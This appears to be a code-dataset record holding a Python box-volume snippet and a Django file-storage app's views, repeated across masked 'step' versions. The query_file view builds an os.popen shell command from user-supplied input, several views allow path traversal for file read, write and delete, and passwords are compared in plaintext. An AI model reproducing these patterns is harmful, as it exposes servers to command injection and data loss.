"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
l, w, h = map(int, input().split())
TSA = 2 * (l * w + w * h + h * l)
V = l * w * h
print(TSA, V)
|
normal
|
{
"blob_id": "d3382ead1d98ba2fb15fe3ea277430f1bb07131c",
"index": 2544,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(TSA, V)\n",
"step-3": "l, w, h = map(int, input().split())\nTSA = 2 * (l * w + w * h + h * l)\nV = l * w * h\nprint(TSA, V)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import os
import shutil
import json
from django.shortcuts import render, HttpResponse
from django.utils.encoding import escape_uri_path
from django.db import transaction
from web_pan.settings import files_folder
from disk import models
# Create your views here.
def logined(func):
def wrapper(request, *args, **kwargs):
session = request.session.get('user')
if not session:
return render(request, 'login.html')
else:
return func(request, *args, **kwargs)
return wrapper
def api_check(func):
def wrapper(request, *args, **kwargs):
session = request.session.get('user')
if not session:
res = dict(
state_code=-3,
error_msg="登陆过期"
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
else:
return func(request, *args, **kwargs)
return wrapper
def login(request):
if request.method == 'GET':
if request.session.get('user'):
return render(request, 'index.html')
return render(request, 'login.html')
else:
req = json.loads(request.body)
user = req.get('username')
pwd = req.get('pwd')
obj_user = models.Users.objects.filter(user_name=user).all()
if not obj_user:
res = dict(
state_code=1,
error_msg="用户不存在"
)
else:
password = obj_user.first().password
if str(pwd) != str(password):
res = dict(
state_code=2,
error_msg="密码错误"
)
else:
request.session['user'] = user
request.session.set_expiry(60*60*4)
res = dict(
state_code=0,
error_msg="密码错误"
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
def logout(request):
if request.session.get('user'):
del request.session['user']
return render(request, 'login.html')
@logined
def index(request):
return render(request, 'index.html')
@api_check
def get_dir_list(request):
user = request.session.get('user')
obj_dir = models.Dirs.objects.filter(user_name=user).all()
dir_list = []
for dirs in obj_dir:
user_dir = dirs.dir
dir_list.append(user_dir)
res = dict(
state_code=0,
error_msg='ok',
data={
"dir_list": dir_list
}
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
@api_check
def user_mkdir(request):
req = json.loads(request.body)
dir_name = req.get('dir_name')
if not dir_name:
res = dict(
state_code=-2,
error_msg='参数错误'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
dir_path = os.path.join(files_folder, dir_name)
if os.path.exists(dir_path):
res = dict(
state_code=1,
error_msg="该目录已被使用"
)
else:
user = request.session.get('user')
if user:
models.Dirs.objects.create(
user_name=user,
dir=dir_name
)
os.mkdir(dir_path)
res = dict(
state_code=0,
error_msg='ok'
)
else:
res = dict(
state_code=-3,
error_msg="登陆过期"
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
@api_check
def del_dir(request):
req = json.loads(request.body)
dir_name = req.get('dir_name')
if not dir_name:
res = dict(
state_code=-2,
error_msg='参数错误'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
dir_path = os.path.join(files_folder, dir_name)
if not os.path.exists(dir_path):
res = dict(
state_code=1,
error_msg='目录不存在'
)
else:
with transaction.atomic():
obj_dir = models.Dirs.objects.filter(dir=dir_name).all()
if obj_dir:
obj_dir.delete()
shutil.rmtree(dir_path)
res = dict(
state_code=0,
eror_msg='ok'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
@api_check
def upload_file(request):
dir_name = request.POST.get('dir_name')
if not dir_name:
res = dict(
state_code=-2,
error_msg='参数错误'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
dir_path = os.path.join(files_folder, dir_name)
if not os.path.exists(dir_path):
res = dict(
state_code=1,
error_msg='目录不存在'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
# 获取上传的文件,如果没有文件,则默认为None;
File = request.FILES.get("file", None)
if File is None:
res = dict(
state_code=-2,
error_msg='参数错误'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
file_name = File.name
file_path = os.path.join(dir_path, file_name)
# 打开特定的文件进行二进制的写操作;
with open(file_path, 'wb+') as f:
# 分块写入文件;
for chunk in File.chunks():
f.write(chunk)
res = dict(
state_code=0,
error_msg='ok',
)
return HttpResponse(json.dumps(res), content_type='application/json')
@api_check
def query_file(request):
req = json.loads(request.body)
dir_name = req.get('dir_name')
dir_path = os.path.join(files_folder, dir_name)
cmd_info = os.popen("ls -l -h {}".format(dir_path)).read()
file_list = cmd_info.split('\n')[1:-1]
file_list_data = []
for file_info_cmd in file_list:
file_info_list = file_info_cmd.split(' ')
file_info = list(filter(None, file_info_list))
file = file_info[-1]
file_size = file_info[4]
name_type = file.rsplit('.', 1)
if len(name_type) < 2:
name_type.append('未知')
file_name, file_type = name_type
file_list_data.append({
'file_name': file_name,
'file_type': file_type,
'file_size': file_size
})
res = dict(
state_code=0,
error_msg='ok',
data={
'file_list': file_list_data
}
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
@api_check
def del_file(request):
req = json.loads(request.body)
dir_name = req.get('dir_name')
file_name = req.get('file_name')
file_type = req.get('file_type')
file = file_name + '.' + file_type if file_type != '未知' else file_name
file_path = os.path.join(os.path.join(files_folder,dir_name),file)
if not os.path.exists(file_path):
res = dict(
state_code=1,
error_msg='文件不存在'
)
else:
os.remove(file_path)
res = dict(
state_code=0,
error_msg='ok'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
@api_check
def download_file(request):
req = json.loads(request.body)
dir_name = req.get('dir_name')
file_name = req.get('file_name')
file_type = req.get('file_type')
file = file_name+'.'+file_type if file_type != '未知' else file_name
file_path = os.path.join(os.path.join(files_folder,dir_name),file)
if not os.path.exists(file_path):
res = dict(
state_code=1,
error_msg='文件不存在'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
from django.http import StreamingHttpResponse
file_size = os.path.getsize(file_path)
def file_iterator(file_name, chunk_size=512): # 用于形成二进制数据
with open(file_name, 'rb') as f:
while True:
c = f.read(chunk_size)
if c:
yield c
else:
break
the_file_name = file_path # 要下载的文件路径
res = file_iterator(the_file_name)
response = StreamingHttpResponse(res) # 这里创建返回
response['Content-Type'] = 'application/octet-stream; charset=UTF-8' # 注意格式
response['Content-Length'] = file_size
response['Content-Disposition'] = 'attachment;filename="{}"'.format(escape_uri_path(file)) # 注意filename 这个是下载后的名字
return response
|
normal
|
{
"blob_id": "eeb87891d1a02484a61537745ec6f13387017929",
"index": 705,
"step-1": "<mask token>\n\n\ndef logined(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n return render(request, 'login.html')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef api_check(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n res = dict(state_code=-3, error_msg='登陆过期')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef login(request):\n if request.method == 'GET':\n if request.session.get('user'):\n return render(request, 'index.html')\n return render(request, 'login.html')\n else:\n req = json.loads(request.body)\n user = req.get('username')\n pwd = req.get('pwd')\n obj_user = models.Users.objects.filter(user_name=user).all()\n if not obj_user:\n res = dict(state_code=1, error_msg='用户不存在')\n else:\n password = obj_user.first().password\n if str(pwd) != str(password):\n res = dict(state_code=2, error_msg='密码错误')\n else:\n request.session['user'] = user\n request.session.set_expiry(60 * 60 * 4)\n res = dict(state_code=0, error_msg='密码错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n\n\ndef logout(request):\n if request.session.get('user'):\n del request.session['user']\n return render(request, 'login.html')\n\n\n@logined\ndef index(request):\n return render(request, 'index.html')\n\n\n@api_check\ndef get_dir_list(request):\n user = request.session.get('user')\n obj_dir = models.Dirs.objects.filter(user_name=user).all()\n dir_list = []\n for dirs in obj_dir:\n user_dir = dirs.dir\n dir_list.append(user_dir)\n res = dict(state_code=0, error_msg='ok', data={'dir_list': dir_list})\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n<mask token>\n\n\n@api_check\ndef upload_file(request):\n dir_name = request.POST.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='目录不存在')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n File = request.FILES.get('file', None)\n if File is None:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n file_name = File.name\n file_path = os.path.join(dir_path, file_name)\n with open(file_path, 'wb+') as f:\n for chunk in File.chunks():\n f.write(chunk)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res), content_type='application/json')\n\n\n@api_check\ndef query_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n dir_path = os.path.join(files_folder, dir_name)\n cmd_info = os.popen('ls -l -h {}'.format(dir_path)).read()\n file_list = cmd_info.split('\\n')[1:-1]\n file_list_data = []\n for file_info_cmd in file_list:\n file_info_list = file_info_cmd.split(' ')\n file_info = list(filter(None, file_info_list))\n file = file_info[-1]\n file_size = file_info[4]\n name_type = file.rsplit('.', 1)\n if len(name_type) < 2:\n name_type.append('未知')\n file_name, file_type = name_type\n file_list_data.append({'file_name': file_name, 'file_type':\n file_type, 'file_size': file_size})\n res = dict(state_code=0, error_msg='ok', data={'file_list': file_list_data}\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef del_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder, dir_name), file)\n if not os.path.exists(file_path):\n res = dict(state_code=1, error_msg='文件不存在')\n else:\n os.remove(file_path)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef logined(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n return render(request, 'login.html')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef api_check(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n res = dict(state_code=-3, error_msg='登陆过期')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef login(request):\n if request.method == 'GET':\n if request.session.get('user'):\n return render(request, 'index.html')\n return render(request, 'login.html')\n else:\n req = json.loads(request.body)\n user = req.get('username')\n pwd = req.get('pwd')\n obj_user = models.Users.objects.filter(user_name=user).all()\n if not obj_user:\n res = dict(state_code=1, error_msg='用户不存在')\n else:\n password = obj_user.first().password\n if str(pwd) != str(password):\n res = dict(state_code=2, error_msg='密码错误')\n else:\n request.session['user'] = user\n request.session.set_expiry(60 * 60 * 4)\n res = dict(state_code=0, error_msg='密码错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n\n\ndef logout(request):\n if request.session.get('user'):\n del request.session['user']\n return render(request, 'login.html')\n\n\n@logined\ndef index(request):\n return render(request, 'index.html')\n\n\n@api_check\ndef get_dir_list(request):\n user = request.session.get('user')\n obj_dir = models.Dirs.objects.filter(user_name=user).all()\n dir_list = []\n for dirs in obj_dir:\n user_dir = dirs.dir\n dir_list.append(user_dir)\n res = dict(state_code=0, error_msg='ok', data={'dir_list': dir_list})\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n<mask token>\n\n\n@api_check\ndef upload_file(request):\n dir_name = request.POST.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='目录不存在')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n File = request.FILES.get('file', None)\n if File is None:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n file_name = File.name\n file_path = os.path.join(dir_path, file_name)\n with open(file_path, 'wb+') as f:\n for chunk in File.chunks():\n f.write(chunk)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res), content_type='application/json')\n\n\n@api_check\ndef query_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n dir_path = os.path.join(files_folder, dir_name)\n cmd_info = os.popen('ls -l -h {}'.format(dir_path)).read()\n file_list = cmd_info.split('\\n')[1:-1]\n file_list_data = []\n for file_info_cmd in file_list:\n file_info_list = file_info_cmd.split(' ')\n file_info = list(filter(None, file_info_list))\n file = file_info[-1]\n file_size = file_info[4]\n name_type = file.rsplit('.', 1)\n if len(name_type) < 2:\n name_type.append('未知')\n file_name, file_type = name_type\n file_list_data.append({'file_name': file_name, 'file_type':\n file_type, 'file_size': file_size})\n res = dict(state_code=0, error_msg='ok', data={'file_list': file_list_data}\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef del_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder, dir_name), file)\n if not os.path.exists(file_path):\n res = dict(state_code=1, error_msg='文件不存在')\n else:\n os.remove(file_path)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef download_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder, dir_name), file)\n if not os.path.exists(file_path):\n res = dict(state_code=1, error_msg='文件不存在')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n from django.http import StreamingHttpResponse\n file_size = os.path.getsize(file_path)\n\n def file_iterator(file_name, chunk_size=512):\n with open(file_name, 'rb') as f:\n while True:\n c = f.read(chunk_size)\n if c:\n yield c\n else:\n break\n the_file_name = file_path\n res = file_iterator(the_file_name)\n response = StreamingHttpResponse(res)\n response['Content-Type'] = 'application/octet-stream; charset=UTF-8'\n response['Content-Length'] = file_size\n response['Content-Disposition'] = 'attachment;filename=\"{}\"'.format(\n escape_uri_path(file))\n return response\n",
"step-3": "<mask token>\n\n\ndef logined(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n return render(request, 'login.html')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef api_check(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n res = dict(state_code=-3, error_msg='登陆过期')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef login(request):\n if request.method == 'GET':\n if request.session.get('user'):\n return render(request, 'index.html')\n return render(request, 'login.html')\n else:\n req = json.loads(request.body)\n user = req.get('username')\n pwd = req.get('pwd')\n obj_user = models.Users.objects.filter(user_name=user).all()\n if not obj_user:\n res = dict(state_code=1, error_msg='用户不存在')\n else:\n password = obj_user.first().password\n if str(pwd) != str(password):\n res = dict(state_code=2, error_msg='密码错误')\n else:\n request.session['user'] = user\n request.session.set_expiry(60 * 60 * 4)\n res = dict(state_code=0, error_msg='密码错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n\n\ndef logout(request):\n if request.session.get('user'):\n del request.session['user']\n return render(request, 'login.html')\n\n\n@logined\ndef index(request):\n return render(request, 'index.html')\n\n\n@api_check\ndef get_dir_list(request):\n user = request.session.get('user')\n obj_dir = models.Dirs.objects.filter(user_name=user).all()\n dir_list = []\n for dirs in obj_dir:\n user_dir = dirs.dir\n dir_list.append(user_dir)\n res = dict(state_code=0, error_msg='ok', data={'dir_list': dir_list})\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef user_mkdir(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='该目录已被使用')\n else:\n user = request.session.get('user')\n if user:\n models.Dirs.objects.create(user_name=user, dir=dir_name)\n os.mkdir(dir_path)\n res = dict(state_code=0, error_msg='ok')\n else:\n res = dict(state_code=-3, error_msg='登陆过期')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef del_dir(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='目录不存在')\n else:\n with transaction.atomic():\n obj_dir = models.Dirs.objects.filter(dir=dir_name).all()\n if obj_dir:\n obj_dir.delete()\n shutil.rmtree(dir_path)\n res = dict(state_code=0, eror_msg='ok')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef upload_file(request):\n dir_name = request.POST.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='目录不存在')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n File = request.FILES.get('file', None)\n if File is None:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n file_name = File.name\n file_path = os.path.join(dir_path, file_name)\n with open(file_path, 'wb+') as f:\n for chunk in File.chunks():\n f.write(chunk)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res), content_type='application/json')\n\n\n@api_check\ndef query_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n dir_path = os.path.join(files_folder, dir_name)\n cmd_info = os.popen('ls -l -h {}'.format(dir_path)).read()\n file_list = cmd_info.split('\\n')[1:-1]\n file_list_data = []\n for file_info_cmd in file_list:\n file_info_list = file_info_cmd.split(' ')\n file_info = list(filter(None, file_info_list))\n file = file_info[-1]\n file_size = file_info[4]\n name_type = file.rsplit('.', 1)\n if len(name_type) < 2:\n name_type.append('未知')\n file_name, file_type = name_type\n file_list_data.append({'file_name': file_name, 'file_type':\n file_type, 'file_size': file_size})\n res = dict(state_code=0, error_msg='ok', data={'file_list': file_list_data}\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef del_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder, dir_name), file)\n if not os.path.exists(file_path):\n res = dict(state_code=1, error_msg='文件不存在')\n else:\n os.remove(file_path)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef download_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder, dir_name), file)\n if not os.path.exists(file_path):\n res = dict(state_code=1, error_msg='文件不存在')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n from django.http import StreamingHttpResponse\n file_size = os.path.getsize(file_path)\n\n def file_iterator(file_name, chunk_size=512):\n with open(file_name, 'rb') as f:\n while True:\n c = f.read(chunk_size)\n if c:\n yield c\n else:\n break\n the_file_name = file_path\n res = file_iterator(the_file_name)\n response = StreamingHttpResponse(res)\n response['Content-Type'] = 'application/octet-stream; charset=UTF-8'\n response['Content-Length'] = file_size\n response['Content-Disposition'] = 'attachment;filename=\"{}\"'.format(\n escape_uri_path(file))\n return response\n",
"step-4": "import os\nimport shutil\nimport json\nfrom django.shortcuts import render, HttpResponse\nfrom django.utils.encoding import escape_uri_path\nfrom django.db import transaction\nfrom web_pan.settings import files_folder\nfrom disk import models\n\n\ndef logined(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n return render(request, 'login.html')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef api_check(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n res = dict(state_code=-3, error_msg='登陆过期')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef login(request):\n if request.method == 'GET':\n if request.session.get('user'):\n return render(request, 'index.html')\n return render(request, 'login.html')\n else:\n req = json.loads(request.body)\n user = req.get('username')\n pwd = req.get('pwd')\n obj_user = models.Users.objects.filter(user_name=user).all()\n if not obj_user:\n res = dict(state_code=1, error_msg='用户不存在')\n else:\n password = obj_user.first().password\n if str(pwd) != str(password):\n res = dict(state_code=2, error_msg='密码错误')\n else:\n request.session['user'] = user\n request.session.set_expiry(60 * 60 * 4)\n res = dict(state_code=0, error_msg='密码错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n\n\ndef logout(request):\n if request.session.get('user'):\n del request.session['user']\n return render(request, 'login.html')\n\n\n@logined\ndef index(request):\n return render(request, 'index.html')\n\n\n@api_check\ndef get_dir_list(request):\n user = request.session.get('user')\n obj_dir = models.Dirs.objects.filter(user_name=user).all()\n dir_list = []\n for dirs in obj_dir:\n user_dir = dirs.dir\n dir_list.append(user_dir)\n res = dict(state_code=0, error_msg='ok', data={'dir_list': dir_list})\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef user_mkdir(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='该目录已被使用')\n else:\n user = request.session.get('user')\n if user:\n models.Dirs.objects.create(user_name=user, dir=dir_name)\n os.mkdir(dir_path)\n res = dict(state_code=0, error_msg='ok')\n else:\n res = dict(state_code=-3, error_msg='登陆过期')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef del_dir(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='目录不存在')\n else:\n with transaction.atomic():\n obj_dir = models.Dirs.objects.filter(dir=dir_name).all()\n if obj_dir:\n obj_dir.delete()\n shutil.rmtree(dir_path)\n res = dict(state_code=0, eror_msg='ok')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef upload_file(request):\n dir_name = request.POST.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='目录不存在')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n File = request.FILES.get('file', None)\n if File is None:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n file_name = File.name\n file_path = os.path.join(dir_path, file_name)\n with open(file_path, 'wb+') as f:\n for chunk in File.chunks():\n f.write(chunk)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res), content_type='application/json')\n\n\n@api_check\ndef query_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n dir_path = os.path.join(files_folder, dir_name)\n cmd_info = os.popen('ls -l -h {}'.format(dir_path)).read()\n file_list = cmd_info.split('\\n')[1:-1]\n file_list_data = []\n for file_info_cmd in file_list:\n file_info_list = file_info_cmd.split(' ')\n file_info = list(filter(None, file_info_list))\n file = file_info[-1]\n file_size = file_info[4]\n name_type = file.rsplit('.', 1)\n if len(name_type) < 2:\n name_type.append('未知')\n file_name, file_type = name_type\n file_list_data.append({'file_name': file_name, 'file_type':\n file_type, 'file_size': file_size})\n res = dict(state_code=0, error_msg='ok', data={'file_list': file_list_data}\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef del_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder, dir_name), file)\n if not os.path.exists(file_path):\n res = dict(state_code=1, error_msg='文件不存在')\n else:\n os.remove(file_path)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef download_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder, dir_name), file)\n if not os.path.exists(file_path):\n res = dict(state_code=1, error_msg='文件不存在')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n from django.http import StreamingHttpResponse\n file_size = os.path.getsize(file_path)\n\n def file_iterator(file_name, chunk_size=512):\n with open(file_name, 'rb') as f:\n while True:\n c = f.read(chunk_size)\n if c:\n yield c\n else:\n break\n the_file_name = file_path\n res = file_iterator(the_file_name)\n response = StreamingHttpResponse(res)\n response['Content-Type'] = 'application/octet-stream; charset=UTF-8'\n response['Content-Length'] = file_size\n response['Content-Disposition'] = 'attachment;filename=\"{}\"'.format(\n escape_uri_path(file))\n return response\n",
"step-5": "import os\nimport shutil\nimport json\nfrom django.shortcuts import render, HttpResponse\nfrom django.utils.encoding import escape_uri_path\nfrom django.db import transaction\nfrom web_pan.settings import files_folder\nfrom disk import models\n\n\n# Create your views here.\n\n\ndef logined(func):\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n return render(request, 'login.html')\n else:\n return func(request, *args, **kwargs)\n\n return wrapper\n\n\ndef api_check(func):\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n res = dict(\n state_code=-3,\n error_msg=\"登陆过期\"\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n else:\n return func(request, *args, **kwargs)\n\n return wrapper\n\n\ndef login(request):\n if request.method == 'GET':\n if request.session.get('user'):\n return render(request, 'index.html')\n return render(request, 'login.html')\n else:\n req = json.loads(request.body)\n user = req.get('username')\n pwd = req.get('pwd')\n obj_user = models.Users.objects.filter(user_name=user).all()\n if not obj_user:\n res = dict(\n state_code=1,\n error_msg=\"用户不存在\"\n )\n else:\n password = obj_user.first().password\n if str(pwd) != str(password):\n res = dict(\n state_code=2,\n error_msg=\"密码错误\"\n )\n else:\n request.session['user'] = user\n request.session.set_expiry(60*60*4)\n res = dict(\n state_code=0,\n error_msg=\"密码错误\"\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n\n\ndef logout(request):\n if request.session.get('user'):\n del request.session['user']\n return render(request, 'login.html')\n\n\n@logined\ndef index(request):\n return render(request, 'index.html')\n\n\n@api_check\ndef get_dir_list(request):\n user = request.session.get('user')\n obj_dir = models.Dirs.objects.filter(user_name=user).all()\n dir_list = []\n for dirs in obj_dir:\n user_dir = dirs.dir\n dir_list.append(user_dir)\n res = dict(\n state_code=0,\n error_msg='ok',\n data={\n \"dir_list\": dir_list\n }\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n\n\n@api_check\ndef user_mkdir(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n if not dir_name:\n res = dict(\n state_code=-2,\n error_msg='参数错误'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if os.path.exists(dir_path):\n res = dict(\n state_code=1,\n error_msg=\"该目录已被使用\"\n )\n else:\n user = request.session.get('user')\n if user:\n models.Dirs.objects.create(\n user_name=user,\n dir=dir_name\n )\n os.mkdir(dir_path)\n res = dict(\n state_code=0,\n error_msg='ok'\n )\n else:\n res = dict(\n state_code=-3,\n 